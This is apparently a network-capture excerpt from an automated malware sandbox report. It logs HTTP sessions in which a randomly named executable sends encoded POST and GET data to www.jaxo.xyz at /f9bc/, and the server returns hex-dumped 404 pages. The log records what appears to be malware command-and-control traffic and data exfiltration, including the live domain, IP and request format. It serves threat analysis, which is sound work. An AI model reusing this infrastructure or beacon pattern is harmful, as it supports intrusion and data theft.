                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:45.545634985 CEST224INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                        Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                                        Sep 3, 2024 13:54:45.545646906 CEST1236INData Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                                        Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                                        Sep 3, 2024 13:54:45.545666933 CEST1236INData Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                                        Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                                        Sep 3, 2024 13:54:45.545677900 CEST448INData Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                                        Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                                        Sep 3, 2024 13:54:45.545691967 CEST1236INData Raw: 38 31 20 35 32 2e 35 34 33 2d 35 2e 33 33 33 20 31 35 2e 30 36 2d 34 2e 38 35 32 20 31 36 2e 32 32 33 2d 39 2e 35 35 20 31 37 2e 39 39 38 2d 31 33 2e 32 39 38 20 31 2e 37 37 34 2d 33 2e 37 34 38 2d 31 30 37 2e 33 32 2d 37 2e 38 30 39 2d 31 32 34
                                        Data Ascii: 81 52.543-5.333 15.06-4.852 16.223-9.55 17.998-13.298 1.774-3.748-107.32-7.809-124.3-3.524" transform="translate(161 68)"/> </g> <g class="pao-cima"> <path fill="#FBB868" d="M71.37 0C49.008.035-2.4
                                        Sep 3, 2024 13:54:45.545701027 CEST224INData Raw: 38 37 2e 30 30 37 20 31 2e 34 38 35 2e 32 35 20 32 2e 30 36 37 2e 31 39 2e 34 35 38 2e 36 39 34 2e 34 37 33 2e 37 33 37 2d 2e 32 35 2e 30 34 33 2d 2e 37 35 39 2d 2e 31 30 39 2d 31 2e 35 39 32 2d 2e 33 37 32 2d 32 2e 31 38 31 4d 33 32 2e 35 35 20
                                        Data Ascii: 87.007 1.485.25 2.067.19.458.694.473.737-.25.043-.759-.109-1.592-.372-2.181M32.55 15.101c-1.206.547-1.849 1.662-1.414 2.552.188.384 1.21.504 1.46.077.188-.32.407-.629.616-.942.243-.363.63-.675.767-1.064.173-.486-.753-.93-1.4
                                        Sep 3, 2024 13:54:45.545712948 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                        Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                        Sep 3, 2024 13:54:45.545727968 CEST224INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                        Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.
                                        Sep 3, 2024 13:54:45.545737982 CEST1236INData Raw: 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35 34 39 20 31 35 2e 30 31 37 63 2d 2e 38 33 2d
                                        Data Ascii: 247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052
                                        Sep 3, 2024 13:54:45.551246881 CEST1236INData Raw: 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e 31 37 37 2e 30 33 32 2e 33 31 2e 30 37 34 2e
                                        Data Ascii: 1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.54


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.44975666.29.149.180806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:47.505000114 CEST10833OUTPOST /f9bc/ HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.jaxo.xyz
                                        Referer: http://www.jaxo.xyz/f9bc/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 41 74 2b 6c 72 43 6f 68 65 41 70 79 65 55 54 41 77 67 77 76 55 34 63 54 52 55 4e 6b 72 73 65 6e 67 6c 33 59 30 56 30 4a 46 35 61 4a 2b 66 33 77 39 35 64 70 50 2b 47 64 2f 54 54 36 74 72 51 30 65 50 50 46 47 38 55 38 79 4c 6d 44 6f 32 44 46 37 32 52 4b 2f 45 48 46 44 78 41 37 51 4b 6d 74 34 59 35 75 59 38 39 43 71 5a 5a 63 7a 4d 42 59 57 33 53 53 51 73 68 56 39 49 62 6e 33 59 56 58 39 66 71 76 78 2b 51 45 33 52 52 68 2b 63 78 6e 79 71 31 67 70 61 6d 6a 57 64 6d 66 6f 77 52 38 53 61 55 74 49 76 2b 72 56 47 6d 36 65 53 7a 45 54 65 2f 42 79 59 58 4a 7a 57 77 79 68 56 67 2b 55 63 42 4a 35 75 69 35 38 64 78 6e 70 53 66 63 63 68 41 4c 6c 51 42 43 47 6d 46 43 6f 53 48 46 44 47 6d 52 73 79 49 78 6b 46 79 59 4a 49 45 73 79 34 31 47 7a 54 69 56 50 4a 39 70 70 52 63 68 55 31 72 49 37 67 75 69 66 4a 34 45 41 6b 4e 36 46 76 53 42 39 76 37 49 4d 38 34 72 71 2b 73 39 52 64 62 71 51 [TRUNCATED]
                                        Data Ascii: r8=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QE3RRh+cxnyq1gpamjWdmfowR8SaUtIv+rVGm6eSzETe/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcchALlQBCGmFCoSHFDGmRsyIxkFyYJIEsy41GzTiVPJ9ppRchU1rI7guifJ4EAkN6FvSB9v7IM84rq+s9RdbqQ4UXsjrbnuWdALFCLq5sBrWS1dJfgmGnCq6Pbe5pXXsVd2yR3/bZGhMIvS/CWEAcOhWnUhp4HN6UpjzaRH+NMCNJcLOsJWA0pZGp9IAVFHc2GbEJvIJ8Uw22Rsi4NiiPi7LaeEGYunIK/Dnea1OL/VgZ8Ku49v9A7dG221fDbiIrMpjPTV6Xnz8ODHAMWcSiwKHJaX3oxV1pA38tXB9WoFih3Wb1rBfGhN6vM/apC80roizY4FrshY1Nydu1q/e8f8sbTiEo4PC1W/GUSCMW+01UJKtVoDNd5fWXW3vyXrILDDsWqtWB0G1kvPL86eZBQc/UJC9ap8P4MwTF70uaBx06v6anyYW/U1s3kAmTici++KlbmQfIEkE52jiJjuloSRuWKhckRu3zx8ZtV1olz/CCWc9MdHj9cT+bMOd4HprglbJDe9V8fxZccttK90Bu4x40DVS5r9CNV2/LnWIM5UeqQf9I6+ulrKMslZDIkDPc9YqKDoDCSg4A2+2Qi1pnBhczhYekVCpalPelxSXqiM04OQACw3a+64aXDgMfbomY94ppArfkgZD3I01uByJQWQQci3Clsb31G5l4XDWcCDy0Xah7cI0s8/MPdY8vrHRt94EGa2cqrhpqOqpALGhez7GbQd+F0UyDNtoCdXTP3+5Va2oDvJn3TeI [TRUNCATED]
                                        Sep 3, 2024 13:54:48.140322924 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:47 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:48.140471935 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                        Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                        Sep 3, 2024 13:54:48.140487909 CEST1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                        Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                        Sep 3, 2024 13:54:48.140501022 CEST1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                        Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                        Sep 3, 2024 13:54:48.140515089 CEST896INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                        Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                        Sep 3, 2024 13:54:48.140590906 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                        Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                        Sep 3, 2024 13:54:48.140625000 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                        Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                        Sep 3, 2024 13:54:48.140636921 CEST1236INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                        Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                        Sep 3, 2024 13:54:48.140672922 CEST1236INData Raw: 63 2d 2e 32 36 35 2d 31 2e 31 37 37 2d 31 2e 34 37 37 2d 32 2e 31 35 33 2d 32 2e 35 31 2d 31 2e 37 38 34 2d 2e 35 34 38 2e 31 39 35 2d 2e 36 35 33 20 31 2e 31 35 36 2d 2e 31 30 34 20 31 2e 34 34 32 2e 32 39 34 2e 31 35 33 2e 35 33 2e 33 39 37 2e
                                        Data Ascii: c-.265-1.177-1.477-2.153-2.51-1.784-.548.195-.653 1.156-.104 1.442.294.153.53.397.762.655.326.36.549.611.988.784.564.223.992-.535.864-1.097M100.988 4.781c.03-.437-.169-.702-.568-.724-.906-.33-1.89.849-2.3 1.608-.47.873.538 1.63 1.223 1.22.683-
                                        Sep 3, 2024 13:54:48.140685081 CEST1236INData Raw: 2e 31 34 38 2e 39 38 32 2e 32 35 20 31 2e 34 36 2e 31 39 36 2e 39 30 37 2e 38 34 39 2e 31 38 32 2e 37 30 33 2d 2e 37 34 35 4d 37 38 2e 39 35 37 20 32 34 2e 34 39 36 63 2e 30 36 38 2d 2e 33 31 2e 30 35 2d 2e 36 31 36 2d 2e 30 32 2d 2e 39 31 2d 2e
                                        Data Ascii: .148.982.25 1.46.196.907.849.182.703-.745M78.957 24.496c.068-.31.05-.616-.02-.91-.077-.321-.14-.65-.183-1.002-.099-.82-.671-.76-.736.076-.056.71.019 1.361.23 1.918.132.348.265.461.467.377-.18.076.075.038.116.016.071-.038.117-.183.135-.33.01-.0
                                        Sep 3, 2024 13:54:48.145411968 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 66
                                        Data Ascii: </g> </g> </g> <g fill-rule="nonzero" stroke="#979797" stroke-linecap="round" stroke-width="1.8" class="left-sparks"> <path d="M23.684 5.789L30 1.158" transform="ro


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.44975766.29.149.180806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:50.042973995 CEST478OUTGET /f9bc/?r8=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:50.599783897 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:50 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:50.599802017 CEST1236INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                                        Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}
                                        Sep 3, 2024 13:54:50.599813938 CEST1236INData Raw: 31 39 36 2d 34 2e 31 2d 32 35 2e 37 2d 31 2e 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d
                                        Data Ascii: 196-4.1-25.7-1.774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.71
                                        Sep 3, 2024 13:54:50.599836111 CEST1236INData Raw: 39 20 32 30 2e 38 20 36 35 2e 31 37 35 20 32 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e
                                        Data Ascii: 9 20.8 65.175 21.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34
                                        Sep 3, 2024 13:54:50.599850893 CEST1236INData Raw: 20 33 2e 32 38 39 20 31 2e 34 35 38 20 32 31 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e
                                        Data Ascii: 3.289 1.458 21.239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161
